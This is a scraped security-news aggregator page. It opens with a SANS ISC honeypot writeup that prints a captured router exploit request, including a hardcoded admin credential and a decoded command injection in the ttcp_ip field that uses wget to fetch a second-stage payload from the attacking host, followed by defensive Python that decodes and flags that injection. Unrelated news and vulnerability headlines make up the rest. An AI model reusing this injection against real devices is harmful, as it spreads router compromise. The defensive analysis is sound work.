Hackin9

Finally, our honeypot captured something that appears to be responsible for the scanning activity we have been seeing:

The initial request, as discussed earlier, is:

GET /HNAP1/ HTTP/1.1
Host: [ip of host]:8080
 
The next request is where it gets interesting:
 
POST /[withheld].cgi HTTP/1.1
Host: [ip of host]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://31.134.203.79:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH    <- username: admin   password: &i1*@U$6xvcG (still trying to figure out the significance of this password)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518
 
%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%37%30%2e%31%38%34%2e%31%30%37%2e%32%34%33%3a%31%39%33%2f%30%52%78%2e%6d%69%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31
 
The decoded version of this request:
 
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`&StartEPI=1

So it looks like it will try to download a "second stage" from port 193 on the attacking router. I just got this request a couple of minutes ago and haven't been able to retrieve the second stage yet; it may "go away" shortly after the attack. The ".L26" file appears to be a lock file to prevent the same device from being exploited more than once.

I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.
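As an added example (not code from the diary), here is how a defender might decode the captured body and pull out the injected command; it uses the documentation address 192.0.2.1 in place of the withheld source IP and shows why the attacker's encoding of the '=' characters matters for whatever parses the body.

```python
"""Decode the percent-encoded form body from the honeypot capture above and
flag the backtick command injection in ttcp_ip. Added example, not code from
the ISC diary; 192.0.2.1 stands in for the withheld source IP."""
import re
from urllib.parse import unquote

# Constructed sample: the diary's decoded body with a placeholder attacker IP.
DECODED_BODY = (
    "submit_button=&change_action=&submit_type=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];"
    "then wget http://192.0.2.1:193/0Rx.mid;fi`&StartEPI=1"
)

def encode_like_capture(body: str) -> str:
    """Mirror the capture's obfuscation: every byte except the '&' separator
    is written as %XX, including the '=' between name and value."""
    return "".join(c if c == "&" else "%%%02x" % ord(c) for c in body)

RAW_BODY = encode_like_capture(DECODED_BODY)

def decode_body(raw: str) -> dict:
    """Split on the literal '&', percent-decode each pair, then split on the
    first '='. Order matters: urllib.parse.parse_qs splits on '=' before
    decoding, so the encoded %3d leaves it with a name of 'commit=0'."""
    fields = {}
    for pair in raw.split("&"):
        if pair:
            name, _, value = unquote(pair).partition("=")
            fields[name] = value
    return fields

# Shell command substitution (`...` or $(...)) and any URL inside it.
SUBST_RE = re.compile(r"`([^`]*)`|\$\(([^)]*)\)")
URL_RE = re.compile(r"https?://[^\s;`'\"]+")

def find_injections(fields: dict) -> list:
    """One finding per field whose value carries a command substitution."""
    findings = []
    for name, value in fields.items():
        for m in SUBST_RE.finditer(value):
            cmd = m.group(1) if m.group(1) is not None else m.group(2)
            findings.append({"field": name, "command": cmd,
                             "urls": URL_RE.findall(cmd)})
    return findings

if __name__ == "__main__":
    for f in find_injections(decode_body(RAW_BODY)):
        print(f"{f['field']}: {f['command']}  urls={f['urls']}")
```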

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Broadcom got a jump on Mobile World Congress this week, announcing two steps forward in its fledgling LTE silicon business. On Monday, the company introduced a turnkey solution for LTE smartphones to be priced under US$300. On Tuesday, it announced a test, on a live carrier network in Finland, of a high-end handset chip that can use so-called Category 6 LTE with speeds as high as 300Mbps (bits per second).
 
Cisco Systems reported another tough quarter on Wednesday, saying profits in its fiscal second quarter fell by more than half and revenue declined by nearly 8%.
 
U.S. Senator Rand Paul has delivered on promises to file a lawsuit challenging the U.S. National Security Agency's authority to engage in mass surveillance.
 
VMware will offer virtual desktop services for Google's Chromebooks, allowing them to run Windows applications on the pared-down laptops based on the Chrome OS.
 
Sitecore CMS 'xmlcontrol' Parameter Cross-Site Scripting Vulnerability
 
The Alliance for Wireless Power and the Power Matters Alliance joined forces this week, which should help hardware makers settle on a wireless charging standard for their devices.
 
Samsung Wednesday dropped a hint that its coming Galaxy S5 smartphone will have an updated user interface, possibly featuring simpler, flatter icons.
 
Verizon Wireless will sell the Nokia Lumia Icon smartphone starting Feb. 20 for $199.99 and a two-year contract.
 

The breach at Target that exposed payment card data and personal details for as many as 110 million of its customers may have begun with a simple malware-laced phishing e-mail sent to a refrigeration contractor that worked for the retailer, according to a report published Wednesday by KrebsOnSecurity.

The article builds off details unearthed last week by the same publication. Reporter Brian Krebs wrote that the hackers who penetrated Target's corporate network gained entry using authentication credentials stolen from a heating, ventilation, and air-conditioning (HVAC) subcontractor that did work for a variety of large retailers. The HVAC firm, Fazio Mechanical located in Sharpsburg, Pennsylvania, later issued a statement saying its data connection to Target's network was solely for purposes of electronic billing, contract submission, and project management.

Citing multiple people familiar with the ongoing investigation, Krebs said Wednesday that the Target credentials were obtained using an e-mail malware attack that began about two months before thieves began siphoning data for 40 million payment cards from Target's network-connected cash registers. Two of the sources said the malware was the Citadel password stealing program, but that detail hasn't been confirmed. Krebs went on to raise the possibility that the people who compromised the HVAC firm may not have done so with the intent of hacking Target and carrying out one of the largest data thefts in history. He also said that documentation that Target left in plain view on its website may have made the subsequent attack much easier to carry out. Krebs explained:

ImageMagick PSD Image File Handling Remote Buffer Overflow Vulnerability
 
Python 'sock_recvfrom_into()' Function Buffer Overflow Vulnerability
 
OpenStack Glance Information Disclosure Vulnerability
 
Windows' share of the smartphone market fell slightly in the December quarter as the biggest manufacturer supporting Microsoft's OS, Nokia, posted less-than-stellar sales numbers, IDC said today.
 
MIT scientists are writing computer programs that can control large teams of robots or networks of devices with different functions.
 
Zavio IP Cameras CVE-2013-2569 Security Bypass Vulnerability
 
Novell iPrint Client CVE-2013-1091 Buffer Overflow Vulnerability
 
To help organizations charged with providing the nation's financial, energy, health care and other critical systems better protect their information and physical assets from cyber attack, the Commerce Department's National ...
 
A new cybersecurity framework released Wednesday by U.S. President Barack Obama's administration aims to help operators of critical infrastructure develop comprehensive cybersecurity programs.
 
Enterprises will in the future get hosted unified communication services via mobile networks, according to telecom vendor Ericsson, which has developed the underlying platform to make that possible.
 
Toyota is recalling nearly 1.9 million Prius hybrid vehicles around the world in order to fix a software glitch that could damage transistors and cause a loss of power.
 
A group representing 22 of the world's largest banks is pushing for broad adoption in the U.S. of payment card technology called tokenization, citing shortcomings in the planned migration to the Europay MasterCard Visa smartcard standard over the next two years.
 
GNU glibc 'posix/fnmatch.c' Source File Denial of Service Vulnerability
 
Ruby Random Number Generation Local Denial Of Service Vulnerability
 
Mozilla has kicked off a project to show ads to new users of its Firefox browser, a move one analyst said is a search for revenue beyond the firm's overwhelming reliance on Google.
 
Twitter is reportedly working to redesign its profile pages, making them more visual, with bigger images, and looking a lot more like social rivals Facebook and Google+.
 
[Figure: one of the many fraudulent SSL certificates, this one impersonating Facebook. Facebook apps won't be fooled by it, but other programs might. Image: Netcraft]

Researchers have found dozens of fake certificates impersonating the secure sections of online banks, e-commerce sites, and social networks. Google, Facebook, iTunes, and even a POP e-mail server belonging to GoDaddy are a small sample of the services affected by the fraudulent credentials, which in some cases can allow attackers to read and modify encrypted traffic passing between end users and protected servers.

The secure sockets layer (SSL) certificates don't pose much of a threat to people using a popular Web browser to visit spoofed websites, because the credentials aren't digitally signed by a trusted certificate authority, researchers from Netcraft wrote in a blog post published Wednesday. They went on to say that people accessing sensitive websites with smartphone apps or other non-browser software may not be so lucky.

They cited several reports published in the past few years that detailed fatal weaknesses in popular software that made it possible for attackers to decrypt encrypted traffic and in some cases impersonate a cryptographically authenticated server. An October 2012 academic study, for instance, uncovered critical defects in a wide-range of applications running on computers and smartphones—some from banks such as Chase and services such as AOL—that failed to check the validity of SSL certificates. A separate study found that Android apps installed on as many as 185 million devices exposed end users' online banking and social networking credentials as well as e-mail and instant-messaging content because the programs used inadequate encryption protections. A more recent report from security firm IO Active uncovered similar weaknesses in apps written for Apple's iOS platform.

Pidgin 'sipmsg_parse_header()' Function Buffer Overflow Vulnerability
 
Libreswan 'ikev2parent_inI1outR1()' Function Remote Denial of Service Vulnerability
 
Technology is becoming a major player in romantic relationships, according to a report from the Pew Internet & American Life Project.
 
Apple's iTunes, software and services group generated almost as much revenue in 2013 as the Microsoft division responsible for licensing Windows to computer and smartphone makers, according to comparisons of the companies' financial statements.
 
The open source code that made Android a success is blunting Google's control over the mobile platform. Device makers like Amazon and Nokia are modifying -- or forking -- Android's source code to support their apps rather than Google's.
 
The storyline that a single point of failure allowed a sophisticated attacker to steal millions of card numbers from Target just doesn't hold up.
 
Adobe Systems released a security update for Shockwave Player in order to address two vulnerabilities that could allow attackers to remotely take control of affected systems.
 
If you think Yahoo has given up on search, think again. The company may have handed its back-end search operations to Microsoft, but CEO Marissa Mayer said there's work to be done on mobile devices, particularly around contextual search.
 
Hewlett-Packard said security and safety updates will be provided to all its server users after a controversy surrounding the company's decision to restrict access to firmware updates to server customers on warranty or covered by a support agreement.
 
The problems plaguing Bitcoin worsened Tuesday as online attacks on the digital currency's software affected two more exchanges.
 
Klout, a website that provides social media users with a measure of their "influence," is close to being acquired by a social marketing company for $100 million, according to published reports.
 
Smart cities aren't the stuff of science fiction. Governments -- in the heartland and on both coasts -- are using sensors, social media, big data and other technologies to provide better services to citizens.
 
Apple's iPhone shipments to China hit a record in the fourth quarter, but the company was pushed out of the top five smartphone makers in the country by strong demand for phones from local vendor Xiaomi.
 
The exclusive relationship of ICANN (the Internet Corporation for Assigned Names and Numbers) with the U.S. must end said the European Union's digital agenda chief on Wednesday.
 
Two years after launching its smart home remote monitoring service amid fanfare, Verizon Communications stopped offering the service to new customers. It plans a reboot later this year.
 
12-bay rack-mount systems from QNAP, Netgear, LenovoEMC, and Infortrend combine huge storage capacities, business-grade features, smooth setup, and easy administration
 
Linux Kernel 'pn_recvmsg()' Function Local Information Disclosure Vulnerability
 
Linux Kernel CVE-2013-7263 Multiple Information Disclosure Vulnerabilities
 

Posted by InfoSec News on Feb 12

http://houston.cbslocal.com/2014/02/08/police-teen-tricked-oklahoma-walmart-managers-out-of-nearly-30000/

CBS Houston
February 8, 2014

NORMAN, Okla. -- A 17-year-old scammed 3 Oklahoma Walmart stores out of nearly
$30,000, reports KFOR-TV.

Police say the teen, whose name is not being released because he is a juvenile,
conned the managers of those stores into thinking he was an employee.

At a Walmart in Moore, the teen "acted as if he...
 

Posted by InfoSec News on Feb 12

http://www.arabianbusiness.com/qatar-establish-cyber-security-committee-537614.html

By Courtney Trenwith
arabianbusiness.com
6 February 2014

Qatar has announced it will establish a national cyber security committee to
oversee the country’s fight against cyber crime and prevention strategies.

The committee, which has been approved by the Cabinet, also would be involved
in the protection of vital infrastructure and information, communication...
 

Posted by InfoSec News on Feb 12

http://www.stuff.co.nz/technology/digital-living/30015122/white-hat-hackers-to-gather-in-tokyo

stuff.co.nz
February 10 2014

Computer security experts from Japan and abroad will gather in Tokyo later
this month to discuss cutting-edge measures against cyberattacks.

The Code Blue conference will be held February 17 and 18, attended by
world-class computer security experts often called "white hat hackers".

It will be the first such...
 

Posted by InfoSec News on Feb 12

http://www.nytimes.com/2014/02/12/us/politics/spy-chief-says-snowden-took-advantage-of-perfect-storm-of-security-lapses.html

By DAVID E. SANGER and ERIC SCHMITT
The New York Times
FEB. 11, 2014

WASHINGTON -- The director of national intelligence acknowledged Tuesday
that nearly a year after the contractor Edward J. Snowden "scraped" highly
classified documents from the National Security Agency’s networks, the
technology was not...
 

Posted by InfoSec News on Feb 12

Forwarded from: BSidesLV Info <info (at) bsideslv org>

BSides Las Vegas is happy to announce that the CFP and CFM for our Proving
Ground track is now open.

Proving Ground is a Speaker Development Program, which teams new speakers
up with proven veteran speakers, as mentors.

If you would like to apply to our Proving Ground program as a new speaker,
the CFP form is here:...
 